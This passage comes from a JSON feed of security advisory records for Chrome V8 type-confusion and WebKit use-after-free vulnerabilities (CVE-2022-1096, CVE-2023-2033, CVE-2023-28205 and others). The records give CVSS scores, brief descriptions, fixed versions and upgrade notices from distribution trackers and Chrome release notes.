{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2022-1096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-07-23T00:00:00", "id": "UB:CVE-2022-1096", "href": "https://ubuntu.com/security/CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-09T13:21:22", "description": "A flaw was found in the WebKitGTK package. An improper input validation\nissue may lead to a use-after-free vulnerability. This flaw allows\nattackers with network access to pass specially crafted web content files,\ncausing a denial of service or arbitrary code execution. This CVE exists\nbecause of a CVE-2023-28205 security regression for the WebKitGTK package\nin Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=2188543>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8 \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | This CVE is specific to Red Hat's webkitgtk package, Ubuntu is not vulnerable to this issue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T00:00:00", "type": "ubuntucve", "title": "CVE-2023-2203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-17T00:00:00", "id": "UB:CVE-2023-2203", "href": "https://ubuntu.com/security/CVE-2023-2203", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-11-08T18:32:18", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T19:15:00", "type": "debiancve", "title": "CVE-2023-28205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-10T19:15:00", "id": "DEBIANCVE:CVE-2023-28205", "href": "https://security-tracker.debian.org/tracker/CVE-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-30T18:21:19", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T19:15:09", "type": "debiancve", "title": "CVE-2023-2033", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-14T19:15:09", "id": "DEBIANCVE:CVE-2023-2033", "href": "https://security-tracker.debian.org/tracker/CVE-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:47", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T23:15:00", "type": "debiancve", "title": "CVE-2022-3723", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-11-01T23:15:00", "id": "DEBIANCVE:CVE-2022-3723", "href": "https://security-tracker.debian.org/tracker/CVE-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:46", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T22:15:00", "type": "debiancve", "title": "CVE-2022-1364", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-07-26T22:15:00", "id": "DEBIANCVE:CVE-2022-1364", "href": "https://security-tracker.debian.org/tracker/CVE-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:47", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T21:15:00", "type": "debiancve", "title": "CVE-2022-4262", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-02T21:15:00", "id": "DEBIANCVE:CVE-2022-4262", "href": "https://security-tracker.debian.org/tracker/CVE-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:46", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:15:00", "type": "debiancve", "title": "CVE-2022-1096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-07-23T00:15:00", "id": "DEBIANCVE:CVE-2022-1096", "href": "https://security-tracker.debian.org/tracker/CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-11T02:29:28", "description": "A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T22:15:00", "type": "debiancve", "title": "CVE-2023-2203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-17T22:15:00", "id": "DEBIANCVE:CVE-2023-2203", "href": "https://security-tracker.debian.org/tracker/CVE-2023-2203", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2023-11-01T19:20:30", "description": "[2.36.7-1.3]\n- Add patch for CVE-2023-28205\n Resolves: #2185744", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T00:00:00", "type": "oraclelinux", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-20T00:00:00", "id": "ELSA-2023-1918", "href": "http://linux.oracle.com/errata/ELSA-2023-1918.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-01T19:20:32", "description": "[2.36.7-1.3]\n- Add patch for CVE-2023-28205\n Resolves: #2185740", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T00:00:00", "type": "oraclelinux", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-20T00:00:00", "id": "ELSA-2023-1919", "href": "http://linux.oracle.com/errata/ELSA-2023-1919.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-04-16T23:04:57", "description": "\nMultiple security issues were discovered in Chromium, which could result\nin the execution of arbitrary code.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 112.0.5615.121-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {}, "published": "2023-04-16T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-16T23:04:55", "id": "OSV:DSA-5390-1", "href": "https://osv.dev/vulnerability/DSA-5390-1", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-10T07:20:59", "description": "\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 100.0.4896.127-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-04-16T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2022-08-10T07:20:53", "id": "OSV:DSA-5121-1", "href": "https://osv.dev/vulnerability/DSA-5121-1", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-05T18:09:50", "description": "\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 108.0.5359.94-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-04T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T01:59:30", "id": "OSV:DSA-5295-1", "href": "https://osv.dev/vulnerability/DSA-5295-1", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-10T07:07:11", "description": "\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code if a malicious website is visited.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 99.0.4844.84-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-28T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2022-08-10T07:07:10", "id": "OSV:DSA-5110-1", "href": "https://osv.dev/vulnerability/DSA-5110-1", "cvss": {"score": 0.0, "vector": "NONE"}}], "cnvd": [{"lastseen": "2023-04-19T05:29:18", "description": "Chrome is a free and fast Internet browser software developed by Google, Inc. with the goal of making Google Chrome is based on the more powerful JavaScript V8 Google Chrome is based on the more powerful JavaScript V8 engine, which improves the browser's processing speed. It supports multi-tab browsing, with each tab page running in a separate \"sandbox\". Each tabbed page runs in a separate \"sandbox. A type obfuscation vulnerability exists in Google Chrome V8, which can be exploited to execute arbitrary code in the context of an application by tricking users into opening malicious links.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-17T00:00:00", "type": "cnvd", "title": "Google Chrome V8 Type Obfuscation Vulnerability (CNVD-2023-28127)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-17T00:00:00", "id": "CNVD-2023-28127", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-28127", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-06T11:23:22", "description": "Google Chrome is a web browser from Google, Inc. A security vulnerability exists in Google Chrome that could be exploited by attackers to execute arbitrary code or cause a denial of service on a system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-31T00:00:00", "type": "cnvd", "title": "Google Chrome V8 Code Execution Vulnerability (CNVD-2022-85092)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2022-12-06T00:00:00", "id": "CNVD-2022-85092", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-85092", "cvss": {"score": 0.0, "vector": "NONE"}}], "chrome": [{"lastseen": "2023-12-01T02:12:28", "description": "The Stable and extended stable channel has been updated to 112.0.5615.121 for Windows Mac and Linux which will roll out over the coming days/weeks. A full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/112.0.5615.86..112.0.5615.121?pretty=fuller&n=10000>).\n\n\n\n\n\nM112 Stable Update for Desktop - v112.0.5615.121 \n\nSecurity Fixes and Rewards \n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven&#x27;t yet fixed. \n\n\nThis update includes [2](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M112>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n\n[$NA][[1432210](<https://crbug.com/1432210>)] High CVE-2023-2033: Type Confusion in V8. Reported by Cl\u00e9ment Lecigne of Google's Threat Analysis Group on 2023-04-11 \n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\n\nGoogle is aware that an exploit for CVE-2023-2033 exists in the wild. \n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes: \n\n[[1433131](<https://crbug.com/1433131>)] Various fixes from internal audits, fuzzing and other initiatives \n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>). \n\n\n\n\n\n\n\n\n\nInterested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://support.google.com/chrome/community>) is also a great place to reach out for help or learn about common issues.\n\nSrinivas Sista \n\n\nGoogle Chrome", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-14T00:00:00", "id": "GCSA-7014549802422661685", "href": "https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T20:11:41", "description": "The Stable channel has been updated to 107.0.5304.87 for Mac and Linux and 107.0.5304.87/.88 for Windows, which will roll out over the coming days/weeks. A full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/107.0.5304.62..107.0.5304.87?pretty=fuller&n=10000>). \n\n\n\n\n Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven&#x27;t yet fixed.\n\n\n\n\nThis update includes [1](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M107>) security fix. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$TBD][[1378239](<https://crbug.com/1378239>)] High CVE-2022-3723: Type Confusion in V8. Reported by Jan Vojt\u011b\u0161ek, Mil\u00e1nek, and Przemek Gmerek of Avast on 2022-10-25\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. 